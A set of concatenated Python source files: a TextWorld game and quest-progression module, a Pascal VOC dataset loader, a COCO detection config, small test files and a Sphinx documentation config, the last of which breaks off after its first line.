def serialize(self) -> Mapping:
""" Serialize this object.
        Returns:
EntityInfo's data serialized to be JSON compatible
"""
return {slot: getattr(self, slot) for slot in self.__slots__}
class Game:
""" Game representation in TextWorld.
A `Game` is defined by a world and it can have quest(s) or not.
Additionally, a grammar can be provided to control the text generation.
"""
_SERIAL_VERSION = 1
def __init__(self, world: World, grammar: Optional[Grammar] = None,
quests: Iterable[Quest] = ()) -> None:
"""
Args:
world: The world to use for the game.
quests: The quests to be done in the game.
grammar: The grammar to control the text generation.
"""
self.world = world
self.quests = tuple(quests)
self.metadata = {}
self._objective = None
self._infos = self._build_infos()
self.kb = world.kb
self.change_grammar(grammar)
@property
def infos(self) -> Dict[str, EntityInfo]:
""" Information about the entities in the game. """
return self._infos
def _build_infos(self) -> Dict[str, EntityInfo]:
mapping = OrderedDict()
for entity in self.world.entities:
if entity not in mapping:
mapping[entity.id] = EntityInfo(entity.id, entity.type)
return mapping
def copy(self) -> "Game":
""" Make a shallow copy of this game. """
game = Game(self.world, None, self.quests)
game._infos = dict(self.infos)
game._objective = self._objective
game.metadata = dict(self.metadata)
return game
    def change_grammar(self, grammar: Optional[Grammar]) -> None:
        """ Change the grammar used and regenerate all text. """
self.grammar = grammar
_gen_commands = gen_commands_from_actions
if self.grammar:
from textworld.generator.inform7 import Inform7Game
from textworld.generator.text_generation import generate_text_from_grammar
inform7 = Inform7Game(self)
_gen_commands = inform7.gen_commands_from_actions
generate_text_from_grammar(self, self.grammar)
for quest in self.quests:
for event in quest.win_events:
event.commands = _gen_commands(event.actions)
if quest.win_events:
quest.commands = quest.win_events[0].commands
# Check if we can derive a global winning policy from the quests.
if self.grammar:
from textworld.generator.text_generation import describe_event
policy = GameProgression(self).winning_policy
if policy:
mapping = {k: info.name for k, info in self._infos.items()}
commands = [a.format_command(mapping) for a in policy]
self.metadata["walkthrough"] = commands
self.objective = describe_event(Event(policy), self, self.grammar)
def save(self, filename: str) -> None:
""" Saves the serialized data of this game to a file. """
with open(filename, 'w') as f:
json.dump(self.serialize(), f)
@classmethod
def load(cls, filename: str) -> "Game":
""" Creates `Game` from serialized data saved in a file. """
with open(filename, 'r') as f:
return cls.deserialize(json.load(f))
@classmethod
def deserialize(cls, data: Mapping) -> "Game":
""" Creates a `Game` from serialized data.
Args:
data: Serialized data with the needed information to build a
`Game` object.
"""
version = data.get("version", cls._SERIAL_VERSION)
if version != cls._SERIAL_VERSION:
msg = "Cannot deserialize a TextWorld version {} game, expected version {}"
raise ValueError(msg.format(version, cls._SERIAL_VERSION))
kb = KnowledgeBase.deserialize(data["KB"])
world = World.deserialize(data["world"], kb=kb)
game = cls(world)
game.grammar_options = GrammarOptions(data["grammar"])
game.quests = tuple([Quest.deserialize(d) for d in data["quests"]])
game._infos = {k: EntityInfo.deserialize(v) for k, v in data["infos"]}
game.metadata = data.get("metadata", {})
game._objective = data.get("objective", None)
return game
def serialize(self) -> Mapping:
""" Serialize this object.
Results:
Game's data serialized to be JSON compatible
"""
data = {}
data["version"] = self._SERIAL_VERSION
data["world"] = self.world.serialize()
data["grammar"] = self.grammar.options.serialize() if self.grammar else {}
data["quests"] = [quest.serialize() for quest in self.quests]
data["infos"] = [(k, v.serialize()) for k, v in self._infos.items()]
data["KB"] = self.kb.serialize()
data["metadata"] = self.metadata
data["objective"] = self._objective
return data
def __eq__(self, other: Any) -> bool:
return (isinstance(other, Game)
and self.world == other.world
and self.infos == other.infos
and self.quests == other.quests
and self.metadata == other.metadata
and self._objective == other._objective)
def __hash__(self) -> int:
state = (self.world,
frozenset(self.quests),
frozenset(self.infos.items()),
self._objective)
return hash(state)
@property
def max_score(self) -> int:
""" Sum of the reward of all quests. """
return sum(quest.reward for quest in self.quests)
@property
def command_templates(self) -> List[str]:
""" All command templates understood in this game. """
return sorted(set(cmd for cmd in self.kb.inform7_commands.values()))
@property
def directions_names(self) -> List[str]:
return DIRECTIONS
@property
def objects_types(self) -> List[str]:
""" All types of objects in this game. """
return sorted(self.kb.types.types)
@property
def objects_names(self) -> List[str]:
""" The names of all relevant objects in this game. """
def _filter_unnamed_and_room_entities(e):
return e.name and e.type != "r"
entities_infos = filter(_filter_unnamed_and_room_entities, self.infos.values())
return [info.name for info in entities_infos]
@property
def entity_names(self) -> List[str]:
return self.objects_names + self.directions_names
@property
def objects_names_and_types(self) -> List[str]:
""" The names of all non-player objects along with their type in this game. """
def _filter_unnamed_and_room_entities(e):
return e.name and e.type != "r"
entities_infos = filter(_filter_unnamed_and_room_entities, self.infos.values())
return [(info.name, info.type) for info in entities_infos]
@property
def verbs(self) -> List[str]:
""" Verbs that should be recognized in this game. """
# Retrieve commands templates for every rule.
return sorted(set(cmd.split()[0] for cmd in self.command_templates))
@property
def win_condition(self) -> List[Collection[Proposition]]:
""" All win conditions, one for each quest. """
return [q.winning_conditions for q in self.quests]
@property
def objective(self) -> str:
if self._objective is not None:
return self._objective
# TODO: Find a better way of describing the objective of the game with several quests.
self._objective = "\nAND\n".join(quest.desc for quest in self.quests if quest.desc)
return self._objective
@objective.setter
def objective(self, value: str):
self._objective = value
@property
def walkthrough(self) -> Optional[List[str]]:
walkthrough = self.metadata.get("walkthrough")
if walkthrough:
return walkthrough
# Check if we can derive a walkthrough from the quests.
policy = GameProgression(self).winning_policy
if policy:
mapping = {k: info.name for k, info in self._infos.items()}
walkthrough = [a.format_command(mapping) for a in policy]
self.metadata["walkthrough"] = walkthrough
return walkthrough
class ActionDependencyTreeElement(DependencyTreeElement):
""" Representation of an `Action` in the dependency tree.
The notion of dependency and ordering is defined as follows:
* action1 depends on action2 if action1 needs the propositions
added by action2;
* action1 should be performed before action2 if action2 removes
propositions needed by action1.
"""
def depends_on(self, other: "ActionDependencyTreeElement") -> bool:
""" Check whether this action depends on the `other`.
Action1 depends on action2 when the intersection between
the propositions added by action2 and the preconditions
of the action1 is not empty, i.e. action1 needs the
propositions added by action2.
"""
return len(other.action.added & self.action._pre_set) > 0
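    # A hedged worked example of the rule above: suppose `open_door.added`
    # contains the proposition `open(door)` and `take_key._pre_set` also
    # contains `open(door)`. Then the element wrapping `take_key` depends on
    # the element wrapping `open_door`, because
    # `open_door.added & take_key._pre_set` is non-empty.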
@property
def action(self) -> Action:
return self.value
def is_distinct_from(self, others: List["ActionDependencyTreeElement"]) -> bool:
"""
Check whether this element is distinct from `others`.
We check if self.action has any additional information
that `others` actions don't have. This helps us to
identify whether a group of nodes in the dependency tree
already contain all the needed information that self.action
would bring.
"""
new_facts = set(self.action.added)
for other in others:
new_facts -= other.action.added
return len(new_facts) > 0
def __lt__(self, other: "ActionDependencyTreeElement") -> bool:
""" Order ActionDependencyTreeElement elements.
Actions that remove information needed by other actions
should be sorted further in the list.
Notes:
This is not a proper ordering, i.e. two actions
            can mutually remove information needed by each other.
"""
def _required_facts(node):
pre_set = set(node.action._pre_set)
while node.parent is not None:
pre_set |= node.parent.action._pre_set
pre_set -= node.action.added
node = node.parent
return pre_set
return len(other.action.removed & _required_facts(self)) > len(self.action.removed & _required_facts(other))
def __str__(self) -> str:
params = ", ".join(map(str, self.action.variables))
return "{}({})".format(self.action.name, params)
class ActionDependencyTree(DependencyTree):
def __init__(self, *args, kb: Optional[KnowledgeBase] = None, **kwargs):
super().__init__(*args, **kwargs)
self._kb = kb or KnowledgeBase.default()
def remove(self, action: Action) -> Tuple[bool, Optional[Action]]:
changed = super().remove(action)
if self.empty:
return changed, None
# The last action might have impacted one of the subquests.
reverse_action = self._kb.get_reverse_action(action)
if reverse_action is not None:
changed = self.push(reverse_action)
elif self.push(action.inverse()):
# The last action did impact one of the subquests
# but there's no reverse action to recover from it.
changed = True
return changed, reverse_action
def flatten(self) -> Iterable[Action]:
"""
Generates a flatten representation of this dependency tree.
Actions are greedily yielded by iteratively popping leaves from
the dependency tree.
"""
tree = self.copy() # Make a copy of the tree to work on.
last_reverse_action = None
while len(tree.roots) > 0:
            # Use 'sort' to try leaves that don't affect the others first.
for leaf in sorted(tree.leaves_elements):
if leaf.action != last_reverse_action:
break # Choose an action that avoids cycles.
yield leaf.action
_, last_reverse_action = tree.remove(leaf.action)
def copy(self) -> "ActionDependencyTree":
tree = super().copy()
tree._kb = self._kb
return tree
class EventProgression:
""" EventProgression monitors a particular event.
Internally, the event is represented as a dependency tree of
relevant actions to be performed.
"""
def __init__(self, event: Event, kb: KnowledgeBase) -> None:
"""
Args:
            event: The event whose progression to track.
            kb: The knowledge base used for tracking.
"""
self._kb = kb or KnowledgeBase.default()
self.event = event
self._triggered = False
self._untriggerable = False
self._policy = ()
# Build a tree representation of the quest.
self._tree = ActionDependencyTree(kb=self._kb,
element_type=ActionDependencyTreeElement)
if len(event.actions) > 0:
self._tree.push(event.condition)
for action in event.actions[::-1]:
self._tree.push(action)
self._policy = event.actions + (event.condition,)
@property
def triggering_policy(self) -> List[Action]:
""" Actions to be performed in order to trigger the event. """
if self.done:
return ()
# Discard all "trigger" actions.
return tuple(a for a in self._policy if a.name != "trigger")
@property
    def done(self) -> bool:
        """ Check if the event is done (i.e. triggered or untriggerable). """
return self.triggered or self.untriggerable
@property
def triggered(self) -> bool:
""" Check whether the event has been triggered. """
return self._triggered
@property
def untriggerable(self) -> bool:
""" Check whether the event is in an untriggerable state. """
return self._untriggerable
def update(self, action: Optional[Action] = None, state: Optional[State] = None) -> None:
""" Update event progression given available information.
Args:
action: Action potentially affecting the event progression.
state: Current game state.
"""
if self.done:
            return  # Nothing to do, the event is already done.
if state is not None:
# Check if event is triggered.
self._triggered = self.event.is_triggering(state)
# Try compressing the winning policy given the new game state.
if self.compress_policy(state):
return # A shorter winning policy has been found.
if action is not None and not self._tree.empty:
# Determine if we moved away from the goal or closer to it.
changed, reverse_action = self._tree.remove(action)
if changed and reverse_action is None: # Irreversible action.
self._untriggerable = True # Can't track quest anymore.
if changed and reverse_action is not None:
# Rebuild policy.
self._policy = tuple(self._tree.flatten())
def compress_policy(self, state: State) -> bool:
""" Compress the policy given a game state.
Args:
state: Current game state.
Returns:
Whether the policy was compressed or not.
"""
def _find_shorter_policy(policy):
for j in range(0, len(policy)):
for i in range(j + 1, len(policy))[::-1]:
shorter_policy = policy[:j] + policy[i:]
if state.is_sequence_applicable(shorter_policy):
self._tree = ActionDependencyTree(kb=self._kb,
element_type=ActionDependencyTreeElement)
for action in shorter_policy[::-1]:
self._tree.push(action)
return shorter_policy
return None
compressed = False
policy = _find_shorter_policy(self._policy)
while policy is not None:
compressed = True
self._policy = policy
policy = _find_shorter_policy(policy)
return compressed
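# A hedged illustration of `compress_policy` above: with a policy
# (go_east, go_west, go_east, take_key) and a state where the shorter
# sequence (go_east, take_key) is already applicable,
# `_find_shorter_policy` finds j=1, i=3, drops the detour, and rebuilds
# the dependency tree from the two remaining actions.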
class QuestProgression:
""" QuestProgression keeps track of the completion of a quest.
Internally, the quest is represented as a dependency tree of
relevant actions to be performed.
"""
def __init__(self, quest: Quest, kb: KnowledgeBase) -> None:
"""
Args:
quest: The quest to keep track of its completion.
"""
self.quest = quest
self.win_events = [EventProgression(event, kb) for event in quest.win_events]
self.fail_events = [EventProgression(event, kb) for event in quest.fail_events]
@property
    def _tree(self) -> Optional[ActionDependencyTree]:
events = [event for event in self.win_events if len(event.triggering_policy) > 0]
if len(events) == 0:
return None
event = min(events, key=lambda event: len(event.triggering_policy))
return event._tree
@property
def winning_policy(self) -> Optional[List[Action]]:
""" Actions to be performed in order to complete the quest. """
if self.done:
return None
winning_policies = [event.triggering_policy for event in self.win_events if len(event.triggering_policy) > 0]
if len(winning_policies) == 0:
return None
return min(winning_policies, key=lambda policy: len(policy))
@property
def completable(self) -> bool:
""" Check if the quest has winning events. """
return len(self.win_events) > 0
@property
def done(self) -> bool:
""" Check if the quest is done (i.e. completed, failed or unfinishable). """
return self.completed or self.failed or self.unfinishable
@property
def completed(self) -> bool:
""" Check whether the quest is completed. """
return any(event.triggered for event in self.win_events)
@property
def failed(self) -> bool:
""" Check whether the quest has failed. """
return any(event.triggered for event in self.fail_events)
@property
def unfinishable(self) -> bool:
""" Check whether the quest is in an unfinishable state. """
return any(event.untriggerable for event in self.win_events)
def update(self, action: Optional[Action] = None, state: Optional[State] = None) -> None:
""" Update quest progression given available information.
Args:
action: Action potentially affecting the quest progression.
state: Current game state.
"""
if self.done:
return # Nothing to do, the quest is already done.
for event in (self.win_events + self.fail_events):
event.update(action, state)
class GameProgression:
""" GameProgression keeps track of the progression of a game.
    If `tracking_quests` is True, then `winning_policy` will be the list
    of `Action`s that need to be applied in order to complete the game.
"""
def __init__(self, game: Game, track_quests: bool = True) -> None:
"""
Args:
game: The game for which to track progression.
            track_quests: Whether to track the quest progressions.
"""
self.game = game
self.state = game.world.state.copy()
self._valid_actions = list(self.state.all_applicable_actions(self.game.kb.rules.values(),
self.game.kb.types.constants_mapping))
self.quest_progressions = []
if track_quests:
self.quest_progressions = [QuestProgression(quest, game.kb) for quest in game.quests]
for quest_progression in self.quest_progressions:
quest_progression.update(action=None, state=self.state)
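    # A minimal usage sketch (assuming a fully built `game`): replay the
    # current winning policy while the progression tracks quest status.
    #
    #     progression = GameProgression(game)
    #     while not progression.done and progression.winning_policy:
    #         progression.update(progression.winning_policy[0])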
@property
def done(self) -> bool:
""" Whether all quests are completed or at least one has failed or is unfinishable. """
return self.completed or self.failed
@property
def completed(self) -> bool:
""" Whether all quests are completed. """
if not self.tracking_quests:
return False # There is nothing to be "completed".
return all(qp.completed for qp in self.quest_progressions if qp.completable)
@property
def failed(self) -> bool:
""" Whether at least one quest has failed or is unfinishable. """
if not self.tracking_quests:
return False # There is nothing to be "failed".
return any((qp.failed or qp.unfinishable) for qp in self.quest_progressions)
@property
def score(self) -> int:
""" Sum of the reward of all completed quests. """
return sum(qp.quest.reward for qp in self.quest_progressions if qp.completed)
@property
def tracking_quests(self) -> bool:
""" Whether quests are being tracked or not. """
return len(self.quest_progressions) > 0
@property
def valid_actions(self) -> List[Action]:
""" Actions that are valid at the current state. """
return self._valid_actions
@property
def winning_policy(self) -> Optional[List[Action]]:
""" Actions to be performed in order to complete the game.
Returns:
            A policy that leads to winning the game. It can be `None`
            if `tracking_quests` is `False` or the game is already done.
"""
if not self.tracking_quests:
return None
if self.done:
return None
# Greedily build a new winning policy by merging all quest trees.
trees = [quest._tree for quest in self.quest_progressions if quest.completable and not quest.done]
if None in trees:
            # Some quests don't have a triggering policy.
return None
master_quest_tree = ActionDependencyTree(kb=self.game.kb,
element_type=ActionDependencyTreeElement,
trees=trees)
# Discard all "trigger" actions.
return tuple(a for a in master_quest_tree.flatten() if a.name != "trigger")
def update(self, action: Action) -> None:
""" Update the state of the game given the provided action.
Args:
action: Action affecting the state of the game.
"""
# Update world facts.
self.state.apply(action)
# Get valid actions.
self._valid_actions = list(self.state.all_applicable_actions(self.game.kb.rules.values(),
self.game.kb.types.constants_mapping))
# Update all quest progressions given the last action and new state.
for quest_progression in self.quest_progressions:
quest_progression.update(action, self.state)
class GameOptions:
"""
Options for customizing the game generation.
Attributes:
nb_rooms (int):
Number of rooms in the game.
nb_objects (int):
Number of objects in the game.
nb_parallel_quests (int):
Number of parallel quests, i.e. not sharing a common goal.
quest_length (int):
Number of actions that need to be performed to complete the game.
quest_breadth (int):
Number of subquests per independent quest. It controls how nonlinear
a quest can be (1: linear).
quest_depth (int):
Number of actions that need to be performed to solve a subquest.
path (str):
Path of the compiled game (.ulx or .z8). Also, the source (.ni)
and metadata (.json) files will be saved along with it.
force_recompile (bool):
If `True`, recompile game even if it already exists.
file_ext (str):
Type of the generated game file. Either .z8 (Z-Machine) or .ulx (Glulx).
If `path` already has an extension, this is ignored.
seeds (Optional[Union[int, Dict]]):
Seeds for the different generation processes.
* If `None`, seeds will be sampled from
:py:data:`textworld.g_rng <textworld.utils.g_rng>`.
* If `int`, it acts as a seed for a random generator that will be
used to sample the other seeds.
* If dict, the following keys can be set:
* `'map'`: control the map generation;
* `'objects'`: control the type of objects and their
location;
* `'quest'`: control the quest generation;
* `'grammar'`: control the text generation.
For any key missing, a random number gets assigned (sampled
from :py:data:`textworld.g_rng <textworld.utils.g_rng>`).
kb (KnowledgeBase):
The knowledge base containing the logic and the text grammars (see
:py:class:`textworld.generator.KnowledgeBase <textworld.generator.data.KnowledgeBase>`
for more information).
chaining (ChainingOptions):
For customizing the quest generation (see
:py:class:`textworld.generator.ChainingOptions <textworld.generator.chaining.ChainingOptions>`
for the list of available options).
grammar (GrammarOptions):
For customizing the text generation (see
:py:class:`textworld.generator.GrammarOptions <textworld.generator.text_grammar.GrammarOptions>`
for the list of available options).
"""
def __init__(self):
self.chaining = ChainingOptions()
self.grammar = GrammarOptions()
self._kb = None
self._seeds = None
self.nb_parallel_quests = 1
self.nb_rooms = 1
self.nb_objects = 1
self.force_recompile = False
self.file_ext = ".ulx"
self.path = "./tw_games/"
@property
def quest_length(self) -> int:
assert self.chaining.min_length == self.chaining.max_length
return self.chaining.min_length
@quest_length.setter
def quest_length(self, value: int) -> None:
self.chaining.min_length = value
self.chaining.max_length = value
self.chaining.max_depth = value
@property
def quest_breadth(self) -> int:
assert self.chaining.min_breadth == self.chaining.max_breadth
return self.chaining.min_breadth
@quest_breadth.setter
def quest_breadth(self, value: int) -> None:
self.chaining.min_breadth = value
self.chaining.max_breadth = value
@property
def seeds(self):
if self._seeds is None:
self.seeds = {} # Generate seeds from g_rng.
return self._seeds
@seeds.setter
def seeds(self, value: Union[int, Mapping[str, int]]) -> None:
keys = ['map', 'objects', 'quest', 'grammar']
def _key_missing(seeds):
return not set(seeds.keys()).issuperset(keys)
seeds = value
if type(value) is int:
rng = RandomState(value)
seeds = {}
elif _key_missing(value):
rng = g_rng.next()
# Check if we need to generate missing seeds.
self._seeds = {}
for key in keys:
if key in seeds:
self._seeds[key] = seeds[key]
else:
self._seeds[key] = rng.randint(65635)
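    # A usage sketch of the seeding rules above (values are illustrative):
    #
    #     options = GameOptions()
    #     options.seeds = 1234                     # master seed derives all four
    #     options.seeds = {"map": 1, "quest": 2}   # missing keys sampled from g_rng
    #     rngs = options.rngs                      # one RandomState per key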
@property
def rngs(self) -> Dict[str, RandomState]:
rngs = {}
for key, seed in self.seeds.items():
rngs[key] = RandomState(seed)
return rngs
@property
def kb(self) -> KnowledgeBase:
if self._kb is None:
self.kb = KnowledgeBase.load()
return self._kb
@kb.setter
def kb(self, value: KnowledgeBase) -> None:
self._kb = value
self.chaining.kb = self._kb
def copy(self) -> "GameOptions":
return copy.copy(self)
@property
def uuid(self) -> str:
# TODO: generate uuid from chaining options?
uuid = "tw-{specs}-{grammar}-{seeds}"
uuid = uuid.format(specs=encode_seeds((self.nb_rooms, self.nb_objects, self.nb_parallel_quests,
self.chaining.min_length, self.chaining.max_length,
self.chaining.min_depth, self.chaining.max_depth,
self.chaining.min_breadth, self.chaining.max_breadth)),
grammar=self.grammar.uuid,
seeds=encode_seeds([self.seeds[k] for k in sorted(self._seeds)]))
return uuid
def __str__(self) -> str:
infos = ["-= Game options =-"]
slots = ["nb_rooms", "nb_objects", "nb_parallel_quests", "path", "force_recompile", "file_ext", "seeds"]
for slot in slots:
infos.append("{}: {}".format(slot, getattr(self, slot)))
text = "\n ".join(infos)
text += "\n chaining options:\n"
text += textwrap.indent(str(self.chaining), " ")
text += "\n grammar options:\n"
text += textwrap.indent(str(self.grammar), " ")
text += "\n KB:\n"
text += textwrap.indent(str(self.kb), " ")
return text
|
py | b40b2d264513eb24523d23d94c1d12977dcac5f7 | # -*- coding: utf-8 -*-
# Copyright 2018 The Blueoil Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import os
import os.path
from blueoil.datasets.pascalvoc_base import PascalvocBase
class Pascalvoc2012(PascalvocBase):
classes = [
'aeroplane',
'bicycle',
'bird',
'boat',
'bottle',
'bus',
'car',
'cat',
'chair',
'cow',
'diningtable',
'dog',
'horse',
'motorbike',
'person',
'pottedplant',
'sheep',
'sofa',
'train',
'tvmonitor',
]
    available_subsets = ['train', 'validation', 'train_validation']
extend_dir = "PASCALVOC_2012/VOCdevkit/VOC2012"
@property
def num_max_boxes(self):
        # calculated by cls.count_max_boxes(self.skip_difficult)
if self.skip_difficult:
return 39
else:
return 56
def _annotation_file_from_image_id(self, image_id):
"""Return annotation xml file path."""
annotation_file = os.path.join(self.annotations_dir, "{}.xml".format(image_id))
return annotation_file
    def _image_file_from_image_id(self, image_id):
        """Return the image file name of an image."""
return os.path.join(self.jpegimages_dir, "{}.jpg".format(image_id))
def _files_and_annotations(self):
"""Create files and gt_boxes list."""
        if self.subset == "train":
            data_type = "train"
        elif self.subset == "validation":
            data_type = "val"
        elif self.subset == "train_validation":
            data_type = "trainval"
        else:
            raise ValueError("Unsupported subset: {}".format(self.subset))
image_ids = self._image_ids(data_type)
files = [self._image_file_from_image_id(image_id) for image_id in image_ids]
gt_boxes_list = [self._gt_boxes_from_image_id(image_id) for image_id in image_ids]
print("{} {} files and annotations are ready".format(self.__class__.__name__, self.subset))
return files, gt_boxes_list
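# A hedged usage sketch (assuming the PASCALVOC_2012 data is unpacked under
# the expected extend_dir; constructor arguments follow PascalvocBase):
#
#     dataset = Pascalvoc2012(subset="train")
#     files, gt_boxes_list = dataset._files_and_annotations()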
|
py | b40b2d4e57e199697d6fe5f28445b77909e3cbbf | dataset_type = 'CocoDataset'
data_root = '/home/wuyang/data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
samples_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
# ann_file=data_root + 'annotations/instances_val2017.json',
ann_file=data_root + 'annotations/meta_val2017.json',
# ann_file=data_root + 'annotations/image_info_test-dev2017.json',
img_prefix=data_root + 'val2017/',
# img_prefix=data_root + 'test2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
|
py | b40b2db1c90bd5a9f100e0aa9de710f5794a97e8 | import aquests
def test_get_301():
    for i in range(1):
        aquests.get("http://pypi.python.org")
    aquests.fetchall()
|
py | b40b2eba31088e9e8c058591c58c46b600af85de | import pytest
skip = False
try:
from simple_settings.strategies.toml_file import SettingsLoadStrategyToml
except ImportError:
skip = True
@pytest.mark.skipif(skip, reason='Installed without Toml')
class TestTomlStrategy:
@pytest.fixture
def strategy_toml(self):
return SettingsLoadStrategyToml
def test_should_check_a_valid_toml_file(self, strategy_toml):
assert strategy_toml.is_valid_file('foo.toml') is True
def test_should_check_a_invalid_toml_file(self, strategy_toml):
assert strategy_toml.is_valid_file('foo.bar') is False
def test_should_load_dict_with_settings_of_toml_file(self, strategy_toml):
settings = strategy_toml.load_settings_file(
'tests/samples/simple_toml_file.toml'
)
assert settings['SIMPLE_STRING'] == 'simple'
assert settings['COMPLEX_DICT'] == {'complex': 'dict', 'foo': 'bar'}
assert settings['COMPLEX_LIST'] == ['foo', 'bar']
assert settings['SIMPLE_INTEGER'] == 1
assert settings['SIMPLE_BOOL'] is True
def test_should_raise_error_invalid_toml_file_content(self, strategy_toml):
with pytest.raises(Exception):
            strategy_toml.load_settings_file(
                'tests/samples/invalid_toml_file.toml'
            )
|
py | b40b2f90afc82523ac32a1c5c67c2884460e69ec | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
import datetime
sys.path.insert(0, os.path.abspath('../etk'))
sys.path.insert(0, os.path.abspath('../'))
# -- Project information -----------------------------------------------------
project = 'ETK'
copyright = '{}, USC/ISI'.format(datetime.datetime.now().year)
author = 'USC/ISI'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = '0.0.1'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.napoleon',
'sphinx.ext.viewcode',]
# display base class
autodoc_default_flags = ['show-inheritance']
# extensions = [
# 'sphinx.ext.autodoc',
# 'sphinx.ext.doctest',
# 'sphinx.ext.intersphinx',
# 'sphinx.ext.todo',
# 'sphinx.ext.coverage',
# 'sphinx.ext.mathjax',
# 'sphinx.ext.ifconfig',
# 'sphinx.ext.viewcode',
# 'sphinx.ext.githubpages',
# ]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['docstemplates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
'page_width': '1380px',
'sidebar_width': '220px',
'github_user': 'usc-isi-i2',
'github_repo': 'etk',
'github_banner': 'true',
'github_type': 'star',
'extra_nav_links': {
'ETK @ GitHub': 'https://github.com/usc-isi-i2/etk/',
'ETK @ PyPI': 'https://pypi.org/project/etk/',
'Issue Tracker': 'https://github.com/usc-isi-i2/etk/issues',
'USC/ISI CKG': 'http://usc-isi-i2.github.io/'
},
'show_powered_by': False
}
html_show_sourcelink = False
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['docsstatic']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
html_sidebars = {
'**': [
'about.html',
'localtoc.html',
'navigation.html',
# 'relations.html',
'searchbox.html',
# 'donate.html',
]
}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'etkdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'etk.tex', 'etk Documentation',
'Sylvia\\_Lin', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'etk', 'etk Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'etk', 'etk Documentation',
author, 'etk', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# -- Extension configuration -------------------------------------------------
# -- Options for intersphinx extension ---------------------------------------
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
|
py | b40b3191ca980fabbe08390c52b9ef215db6c703 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
